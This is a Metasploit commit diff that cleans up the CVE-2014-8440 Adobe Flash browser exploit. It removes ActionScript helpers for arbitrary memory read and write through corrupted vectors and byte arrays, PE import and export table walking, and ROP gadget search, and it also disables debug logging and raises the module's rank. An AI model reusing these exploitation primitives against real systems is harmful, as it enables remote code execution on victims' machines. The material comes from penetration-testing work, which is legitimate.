Make last code cleanup

jvazquez-r7 · jvazquez-r7 · commit e5d6c9a3cb26 · 2015-06-09T16:01:57.000-05:00
diff --git a/data/exploits/CVE-2014-8440/msf.swf b/data/exploits/CVE-2014-8440/msf.swf
diff --git a/external/source/exploits/CVE-2014-8440/Exploit.as b/external/source/exploits/CVE-2014-8440/Exploit.as
@@ -277,144 +277,5 @@ package
 			}
 			return 0xffffffff
 		}
-		
-		// Use the corrupted shared_ba to disclose its own address
-		private function search_ba_address():uint {
-			var address:uint = 0
-			this.shared_ba.position = 0x14
-			address = shared_ba.readUnsignedInt()
-			if (address == 0) {
-				address = 0xffffffff
-				this.shared_ba.position = 8
-				var next:uint = shared_ba.readUnsignedInt()
-				var prior:uint = shared_ba.readUnsignedInt()
-				if (next - prior == 0x8000) {
-					address = prior + 0x4000
-				}
-			} else {
-				address = address - 0x30
-			}
-
-			return address
-		}
-		
-		// Use the corrupted uint vector to search an vector with
-		// interesting objects for info leaking
-		private function search_object_vector():uint {
-			var i:uint = 0;
-			while (i < 0x4000){
-				if (this.uv[i] == 114 && this.uv[i + 2] != 0xfeedbabe) {
-					return i + 1;
-				}
-				i++
-			}
-			return 0xffffffff
-		}
-		
-		// Methods to use the corrupted uint vector
-		
-		private function vector_write(addr:uint, value:uint = 0):void
-		{
-			var pos:uint = 0
-
-			if (addr > this.uv[0]) {
-				pos = ((addr - this.uv[0]) / 4) - 2
-			} else {
-				pos = ((0xffffffff - (this.uv[0] - addr)) / 4) - 1
-			}
-
-			this.uv[pos] = value
-		}
-
-		private function vector_read(addr:uint):uint
-		{
-			var pos:uint = 0
-
-			if (addr > this.uv[0]) {
-				pos = ((addr - this.uv[0]) / 4) - 2
-			} else {
-				pos = ((0xffffffff - (this.uv[0] - addr)) / 4) - 1
-			}
-
-			return this.uv[pos]
-		}
-		
-		// Methods to use the corrupted byte array for arbitrary reading/writing
-
-		private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
-		{
-			if (addr) ba.position = addr
-			if (value is String) {
-				for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
-				if (zero) ba.writeByte(0)
-			} else ba.writeUnsignedInt(value)
-		}
-
-		private function byte_read(addr:uint, type:String = "dword"):uint
-		{
-			ba.position = addr
-			switch(type) {
-				case "dword":
-					return ba.readUnsignedInt()
-				case "word":
-					return ba.readUnsignedShort()
-				case "byte":
-					return ba.readUnsignedByte()
-			}
-			return 0
-		}
-
-		// Methods to search the memory with the corrupted byte array
-
-		private function base(addr:uint):uint
-		{
-			addr &= 0xffff0000
-			while (true) {
-				if (byte_read(addr) == 0x00905a4d) return addr
-				addr -= 0x10000
-			}
-			return 0
-		}
-
-		private function module(name:String, addr:uint):uint
-		{
-			var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80) 
-			var i:int = -1
-			while (true) {
-				var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
-				if (!entry) throw new Error("FAIL!");
-				ba.position = addr + entry
-				var dll_name:String = ba.readUTFBytes(name.length).toUpperCase();
-				if (dll_name == name.toUpperCase()) {
-					break;
-				}
-			}
-			return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)));
-		}
-
-		private function procedure(name:String, addr:uint):uint
-		{
-			var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
-			var numberOfNames:uint = byte_read(eat + 0x18)
-			var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
-			var addressOfNames:uint = addr + byte_read(eat + 0x20)
-			var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
-
-			for (var i:uint = 0; ; i++) {
-				var entry:uint = byte_read(addressOfNames + i * 4)
-				ba.position = addr + entry
-				if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
-			}
-			return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
-		}
-
-		private function gadget(gadget:String, hint:uint, addr:uint):uint
-		{
-			var find:uint = 0
-			var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
-			var value:uint = parseInt(gadget, 16)
-			for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
-			return addr + i
-		}		
 	}
 }
diff --git a/external/source/exploits/CVE-2014-8440/Logger.as b/external/source/exploits/CVE-2014-8440/Logger.as
@@ -3,7 +3,7 @@ package
     import flash.external.ExternalInterface
 
     public class Logger {
-        private static const DEBUG:uint = 1
+        private static const DEBUG:uint = 0
  
         public static function alert(msg:String):void
         {
diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GoodRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
 

Original file line number	Diff line number	Diff line change
`@@ -3,7 +3,7 @@ package`
`3`	`3`	`import flash.external.ExternalInterface`
`4`	`4`
`5`	`5`	`public class Logger {`
`6`		`- private static const DEBUG:uint = 1`
	`6`	`+ private static const DEBUG:uint = 0`
`7`	`7`
`8`	`8`	`public static function alert(msg:String):void`
`9`	`9`	`{`